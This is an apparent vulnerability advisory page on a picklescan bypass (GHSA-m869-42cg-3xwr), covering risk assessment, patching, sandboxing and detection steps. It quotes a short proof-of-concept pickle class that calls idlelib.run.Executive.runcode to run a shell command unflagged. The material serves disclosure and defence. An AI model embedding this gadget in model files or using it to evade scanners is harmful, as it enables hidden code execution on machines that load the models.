GHSA-m869-42cg-3xwr — MEDIUM AI Security Vulnerability

Q: Is GHSA-m869-42cg-3xwr actively exploited?

No confirmed active exploitation of GHSA-m869-42cg-3xwr has been reported, but organizations should still patch proactively.

Q: How to fix GHSA-m869-42cg-3xwr?

1. PATCH: Upgrade picklescan to >= 0.0.30 immediately — contains the fix for this bypass. 2. AUDIT: Review any model files loaded after scanning with picklescan < 0.0.30; treat provenance as unverified. 3. SANDBOX: Run model loading in isolated environments (containers with no network, restricted syscalls via seccomp) regardless of scan results — defense in depth against future bypasses. 4. FORMAT MIGRATION: Migrate to safetensors format (huggingface/safetensors) which is architecture-safe by design and eliminates the pickle attack surface entirely. 5. DETECT: Alert on execution of idlelib.run or Executive.runcode in production ML workloads via EDR/SIEM process monitoring. 6. SUPPLY CHAIN: Enforce model provenance verification (hash + signature) from trusted registries; never rely on a single scanner as the sole gate.

Q: What systems are affected by GHSA-m869-42cg-3xwr?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD pipelines, model registries, data science workstations.

Q: What is the CVSS score for GHSA-m869-42cg-3xwr?

No CVSS score has been assigned yet.

CISO Take

picklescan, the de-facto security gate for PyTorch and ML model pickle files, fails to flag a payload abusing Python's built-in idlelib.run.Executive.runcode — giving attackers a clean bill of health to achieve RCE. Any MLOps pipeline using picklescan as the primary vetting control before torch.load() or pickle.load() is exposed. Update picklescan to v0.0.30 immediately and treat all pickle-based model files loaded prior to that update as untrusted.

Risk Assessment

Effective risk is HIGH despite the medium CVSS rating. The vulnerability defeats a security control specifically trusted to prevent pickle-based RCE — the false-negative outcome is far more dangerous than a direct exploit, because it removes the human decision to reject a suspicious file. Exploitability is moderate: requires crafting a malicious pickle, but the PoC is public and trivial to adapt. Exposure is broad across organizations running ML model ingestion pipelines, model marketplaces, and AI research environments that standardized on picklescan.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
picklescan	pip	< 0.0.30	`0.0.30`
401 3 dependents Pushed 2mo ago 95% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Moderate

Recommended Action

6 steps

PATCH

Upgrade picklescan to >= 0.0.30 immediately — contains the fix for this bypass.
AUDIT

Review any model files loaded after scanning with picklescan < 0.0.30; treat provenance as unverified.
SANDBOX

Run model loading in isolated environments (containers with no network, restricted syscalls via seccomp) regardless of scan results — defense in depth against future bypasses.
FORMAT MIGRATION

Migrate to safetensors format (huggingface/safetensors) which is architecture-safe by design and eliminates the pickle attack surface entirely.
DETECT

Alert on execution of idlelib.run or Executive.runcode in production ML workloads via EDR/SIEM process monitoring.
SUPPLY CHAIN

Enforce model provenance verification (hash + signature) from trusted registries; never rely on a single scanner as the sole gate.

Classification

Supply Chain Code Execution Model Framework AML.T0010.001 - AI Software AML.T0010.003 - Model AML.T0011.000 - Unsafe AI Artifacts AML.T0018.002 - Embed Malware AML.T0058 - Publish Poisoned Models AML.T0074 - Masquerading AML.T0107 - Exploitation for Defense Evasion

Compliance Impact

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity Art. 9 - Risk management system

ISO 42001

A.6.1.4 - AI supply chain management A.9.3 - AI system security controls

NIST AI RMF

GOVERN 1.7 - AI risks and organizational risk tolerance MANAGE 2.4 - Residual risks treated with mitigations

OWASP LLM Top 10

LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-m869-42cg-3xwr?

picklescan, the de-facto security gate for PyTorch and ML model pickle files, fails to flag a payload abusing Python's built-in idlelib.run.Executive.runcode — giving attackers a clean bill of health to achieve RCE. Any MLOps pipeline using picklescan as the primary vetting control before torch.load() or pickle.load() is exposed. Update picklescan to v0.0.30 immediately and treat all pickle-based model files loaded prior to that update as untrusted.

Is GHSA-m869-42cg-3xwr actively exploited?

No confirmed active exploitation of GHSA-m869-42cg-3xwr has been reported, but organizations should still patch proactively.

How to fix GHSA-m869-42cg-3xwr?

1. PATCH: Upgrade picklescan to >= 0.0.30 immediately — contains the fix for this bypass. 2. AUDIT: Review any model files loaded after scanning with picklescan < 0.0.30; treat provenance as unverified. 3. SANDBOX: Run model loading in isolated environments (containers with no network, restricted syscalls via seccomp) regardless of scan results — defense in depth against future bypasses. 4. FORMAT MIGRATION: Migrate to safetensors format (huggingface/safetensors) which is architecture-safe by design and eliminates the pickle attack surface entirely. 5. DETECT: Alert on execution of idlelib.run or Executive.runcode in production ML workloads via EDR/SIEM process monitoring. 6. SUPPLY CHAIN: Enforce model provenance verification (hash + signature) from trusted registries; never rely on a single scanner as the sole gate.

What systems are affected by GHSA-m869-42cg-3xwr?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD pipelines, model registries, data science workstations.

What is the CVSS score for GHSA-m869-42cg-3xwr?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary Using idlelib.run.Executive.runcode function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to idlelib.run.Executive.runcode function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from idlelib.run import Executive from types import SimpleNamespace class EvilIdlelibRunExecutiveRuncode: def __reduce__(self): payload = "__import__('os').system('whoami')" fake_self = SimpleNamespace(locals={}) return Executive.runcode, (fake_self, payload) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. ### Corresponding https://github.com/FredericDT https://github.com/Qhaoduoyu

Exploitation Scenario

An adversary targets an organization that pulls open-source models from HuggingFace for fine-tuning. They publish a malicious PyTorch model (.pth) embedding the exploit via the EvilIdlelibRunExecutiveRuncode payload — a Python class whose __reduce__ method invokes idlelib.run.Executive.runcode with an arbitrary command string. The organization's MLOps pipeline runs picklescan on all downloaded models; it reports clean. A data scientist runs torch.load() on the model — this deserializes the pickle, triggers __reduce__, and executes the attacker's payload (e.g., reverse shell or credential exfiltration) on the ML training server, which typically has broad AWS/GCP IAM permissions for dataset access.